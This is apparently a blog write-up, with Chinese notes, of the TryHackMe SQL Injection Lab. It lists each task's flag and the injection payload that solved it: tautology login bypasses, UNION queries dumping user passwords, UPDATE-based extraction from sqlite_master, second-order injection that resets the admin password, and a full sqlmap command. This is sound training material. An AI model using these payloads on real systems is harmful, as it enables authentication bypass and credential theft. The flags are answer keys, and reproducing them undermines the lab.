Tryhackme-SQL Injection Lab

2024-06-26 15:12:23

SQL Injection Lab

文章目录

SQL Injection Lab
- Task1 Introduction
- Task2 Introduction to SQL Injection: Part 1
- Task3 Introduction to SQL Injection: Part 2
- Task4 Vulnerable Startup: Broken Authentication
- Task5 Vulnerable Startup: Broken Authentication 2
- Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)
- Task7 Vulnerable Startup: Vulnerable Notes
- Task8 Vulnerable Startup: Change Password
- Task9 Vulnerable Startup: Book Title
- Task10 Vulnerable Startup: Book Title 2

Task1 Introduction

Deploy the machine

Task2 Introduction to SQL Injection: Part 1

1.What is the flag for SQL Injection 1: Input Box Non-String?

THM{dccea429d73d4a6b4f117ac64724f460}

数字型万能密码登陆

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=1 or 1=1 -- AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'

2.What is the flag for SQL Injection 2: Input Box String?

THM{356e9de6016b9ac34e02df99a5f755ba}

字符型万能密码登陆

SELECT uid,name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or '1'='1' --' AND password = 'a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3'

3.What is the flag for SQL Injection 3: URL Injection?

THM{645eab5d34f81981f5705de54e8a9c36}

字符型万能密码登陆,前端限制不允许输入特殊字符,burp截断后编码payload发送
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='1' or 1=1 --' AND password='6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'

4.What is the flag for SQL Injection 4: POST Injection?

THM{727334fd0f0ea1b836a8d443f09dc8eb}

字符型万能密码登陆,前端限制不允许输入特殊字符,burp截断后在POST请求体中写入payload
SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID = '1' or 1=1--' AND password = '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'

Task3 Introduction to SQL Injection: Part 2

What is the flag for SQL Injection 5: UPDATE Statement?

首先爆出表名为usertable和secrets,
UPDATE usertable SET nickName='',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='',email='123',password='a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e998e86f7f7a27ae3' WHERE UID='6'
爆出列名有id,author,secret

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='

爆出数据 ',nickName=(SELECT group_concat(id || "," || author|| "," || secret|| ":") from secrets),email='

Task4 Vulnerable Startup: Broken Authentication

What is the flag for this challenge?

THM{f35f47dcd9d596f0d3860d14cd4c68ec}

万能密码绕过登陆 1' or 1=1--

Task5 Vulnerable Startup: Broken Authentication 2

What is the flag for this challenge?

THM{fb381dfee71ef9c31b93625ad540c9fa}

万能密码登陆,发现页面右上角存在显示位命令 ' UNION SELECT 1,group_concat(password) FROM users-- - 爆出flag

Task6 Vulnerable Startup: Broken Authentication 3 (Blind Injection)

What is the flag for this challenge?

THM{f1f4e0757a09a0b87eeb2f33bca6a5cb}

sqlmap -u http://IP:5000/challenge3/login --data=“username=admin&password=admin” --level=5 --risk=3 --dbms=sqlite -a

Task7 Vulnerable Startup: Vulnerable Notes

What is the flag for this challenge?

THM{4644c7e157fd5498e7e4026c89650814}

二次注入

新建账户名为'union select 1,group_concat(password) from users'

登陆之后点击Notes,程序执行SELECT title, note FROM notes WHERE username = ''union select 1,group_concat(password) from users''语句,爆出所有密码

Task8 Vulnerable Startup: Change Password

What is the flag for this challenge?

二次注入

新建一个名为 admin’-- - 的用户,登陆后更新密码可以更新admin账户的密码

UPDATE users SET password = ? WHERE username = 'admin' -- -'

Task9 Vulnerable Startup: Book Title

What is the flag for this challenge?

THM{27f8f7ce3c05ca8d6553bc5948a89210}

SELECT * from books WHERE id = (SELECT id FROM books WHERE title like '-1') union select 1,2,3,group_concat(password) from users-- -%')

Task10 Vulnerable Startup: Book Title 2

What is the flag for this challenge?

THM{183526c1843c09809695a9979a672f09}

Tryhackme-SQL Injection Lab相关推荐

从入门到入土：[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cooki ...
【PortSwiggerのWeb Security Academy靶场】SQL Injection系列 9th
Subject Lab: Blind SQL injection with conditional responses Url: portswigger.net/web-securit- Mind P ...
ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过 ...
druid sql黑名单报异常 sql injection violation, part alway true condition not allow
最近使用druid,发现阿里这个连接池真的很好用,可以监控到连接池活跃连接数开辟到多少个连接数关闭了多少个,对于我在项目中查看错误问题,很有帮助, 但是最近发现里面有条sql语句被拦截了, ...
网络***技术开篇——SQL Injection
http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要日前,国内最大的程序员社区CSDN网站的用户数据库被***公开 ...
【Web安全】关于SQL Injection和盲注的探索（DVWA）
文章目录 1 SQL Injection 1.1 解释 1.2 手工注入思路 1.3 low 2 SQL Injection (Blind) 2.1 SQL盲注与普通的SQL注入区别 2.2 low ...
SQL Injection（SQL注入）介绍及SQL Injection攻击检测工具
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛 ...
DVWA学习（二）SQL Injection(Blind)
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是 ...

最新文章

热门文章